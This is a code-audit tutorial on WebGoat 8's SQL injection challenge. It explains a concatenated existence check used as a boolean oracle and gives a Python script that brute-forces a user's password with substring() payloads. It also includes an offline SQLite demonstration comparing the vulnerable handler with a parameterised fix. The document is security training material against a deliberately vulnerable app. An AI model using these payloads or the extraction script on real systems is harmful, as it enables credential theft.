
Java Code Audit Primer: WebGoat 8 (First Look) (8)

Vulnerable code block:
username_reg is concatenated straight into checkUserQuery and the query is run through a plain Statement. If the query returns a row, the handler reports that the user already exists; otherwise it builds the INSERT with a PreparedStatement and placeholders, sets the parameters with setString and executes it. The INSERT itself is therefore safe; the injection point is statement.executeQuery(checkUserQuery). Because the two branches return distinguishable responses ("user exists" with lessonCompleted false versus "user created" with lessonCompleted true), the existence check is a boolean oracle: by sending a username of the form tom' and <condition> -- we can brute-force tom's password one character at a time from the response.

```java
try {
    // Injection point: username_reg is concatenated into the query and run
    // through a plain Statement, so the attacker controls the WHERE clause.
    String checkUserQuery = "select userid from " + USERS_TABLE_NAME
            + " where userid = '" + username_reg + "'";
    Statement statement = connection.createStatement();
    ResultSet resultSet = statement.executeQuery(checkUserQuery);
    if (resultSet.next()) {
        // Row found: "user exists", lessonCompleted = false
        attackResult = failed().feedback("user.exists").feedbackArgs(username_reg).build();
    } else {
        // No row: the INSERT uses placeholders and setString, so this part is safe.
        PreparedStatement preparedStatement = connection.prepareStatement(
                "INSERT INTO " + USERS_TABLE_NAME + " VALUES (?, ?, ?)");
        preparedStatement.setString(1, username_reg);
        preparedStatement.setString(2, email_reg);
        preparedStatement.setString(3, password_reg);
        preparedStatement.execute();
        // "user created", lessonCompleted = true
        attackResult = success().feedback("user.created").feedbackArgs(username_reg).build();
    }
    // catch block not shown in the excerpt
```

When the injected condition is true, the query returns a row and the response is "PAYLOAD already exists please try to register with a different username." with "lessonCompleted": false.

When the injected condition is false, no row is found, the INSERT runs, and the response is "PAYLOAD created, please proceed to the login page." with "lessonCompleted": true.

Using length() in the condition, the password length is brute-forced to 23.

With substring() in the condition, a script can then brute-force the password one position at a time.

Script (cleaned up and made runnable under Python 3; the original was Python 2):

```python
#!/usr/bin/env python
# -*- coding:utf-8 -*-
# author:jack
# datetime:2019-09-01 22:31
# software: PyCharm
import requests
import string


def getPassword():
    # Session cookie of a logged-in WebGoat user; replace with your own.
    cookies = {'JSESSIONID': 'dZcRiB0wXwYNLWxpjqdGiIHl2jJojW2fj4-eJRxT'}
    url = "http://127.0.0.1:8080/WebGoat/SqlInjectionAdvanced/challenge"
    password = ''
    # Length was determined to be 23 with length(), so test positions 1..23.
    for num in range(1, 24):
        for word in string.ascii_lowercase:
            # Closes the quoted userid, appends a boolean condition on tom's
            # password, and comments out the trailing quote of the original query.
            pa = "tom' and substring(password," + str(num) + ",1)='" + word + "' -- kljh"
            payload = {'username_reg': pa,
                       'email_reg': '123@123.com',  # requests URL-encodes the '@' itself
                       'password_reg': '123',
                       'confirm_password_reg': '123'}
            r = requests.put(url, cookies=cookies, data=payload)
            # lessonCompleted == False means "user exists", i.e. the condition held.
            # Note: every wrong guess registers the payload as a new user, so do not
            # re-send an identical payload or it will look like a hit.
            if r.json()['lessonCompleted'] is False:
                password += word
                print('password:' + password)
                break
    return password


if __name__ == "__main__":
    getPassword()
```
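The full attack the post describes (boolean oracle from the existence check, length() to find the password length, substring() to extract it), run offline as an added example; this is not code from the original post or from WebGoat. It assumes an in-memory SQLite table named after the page's USERS_TABLE_NAME constant with a constructed tom row and a made-up password; register_vulnerable mirrors the audited Java (concatenated check, parameterised INSERT) and returns the same boolean the script reads from lessonCompleted, and register_fixed is the hardened variant with a parameterised check. It goes beyond the page's script in three ways: the length is found by binary search instead of a linear scan, the character set includes digits, and it confirms the oracle works before extracting, which is what makes the fixed version return nothing. SQLite spells the function substr(); HSQLDB, which WebGoat uses, accepts substring() as in the page's payload.

```python
import sqlite3
import string

# Constructed sample data; not WebGoat's real schema, table name or credentials.
USERS_TABLE_NAME = "sql_challenge_users"
SAMPLE_USERS = [("tom", "tom@example.com", "s3cretpassw0rd")]
CHARSET = string.ascii_lowercase + string.digits  # wider than the page's lowercase-only loop


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute(f"CREATE TABLE {USERS_TABLE_NAME} (userid TEXT, email TEXT, password TEXT)")
    conn.executemany(f"INSERT INTO {USERS_TABLE_NAME} VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def register_vulnerable(conn, username_reg, email_reg, password_reg):
    """Mirrors the audited Java handler. Returns the lessonCompleted value:
    False = 'user exists' (a row matched), True = 'user created'."""
    check_user_query = ("select userid from " + USERS_TABLE_NAME
                        + " where userid = '" + username_reg + "'")
    if conn.execute(check_user_query).fetchone() is not None:  # injection point
        return False
    conn.execute(f"INSERT INTO {USERS_TABLE_NAME} VALUES (?, ?, ?)",
                 (username_reg, email_reg, password_reg))
    return True


def register_fixed(conn, username_reg, email_reg, password_reg):
    """Hardened variant: the existence check is parameterised too."""
    row = conn.execute(f"SELECT userid FROM {USERS_TABLE_NAME} WHERE userid = ?",
                       (username_reg,)).fetchone()
    if row is not None:
        return False
    conn.execute(f"INSERT INTO {USERS_TABLE_NAME} VALUES (?, ?, ?)",
                 (username_reg, email_reg, password_reg))
    return True


def oracle(register, conn, condition):
    """True if the injected condition holds for tom's row.
    Each false guess inserts the payload as a new user, so never repeat a payload."""
    payload = "tom' and " + condition + " -- kljh"
    return register(conn, payload, "123@123.com", "123") is False


def find_length(register, conn, max_len=64):
    """Binary search on length(password) instead of the page's linear scan."""
    lo, hi = 1, max_len
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(register, conn, f"length(password)>{mid}"):
            lo = mid + 1
        else:
            hi = mid
    return lo


def extract_password(register, conn):
    """Returns tom's password, or None if the endpoint is not injectable."""
    if not oracle(register, conn, "1=1"):
        return None  # tautology did not match: the check is parameterised
    found = ""
    for pos in range(1, find_length(register, conn) + 1):
        for ch in CHARSET:
            if oracle(register, conn, f"substr(password,{pos},1)='{ch}'"):
                found += ch
                break
        else:
            found += "?"  # character outside CHARSET
    return found


if __name__ == "__main__":
    print("vulnerable:", extract_password(register_vulnerable, make_db()))
    print("fixed:", extract_password(register_fixed, make_db()))
```

Against the vulnerable handler the extraction recovers the constructed password in a few hundred oracle calls; against register_fixed the tautology probe is stored as a literal username, never matches tom's row, and extraction stops immediately.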

This concludes the article. Thank you for reading; your comments are welcome.
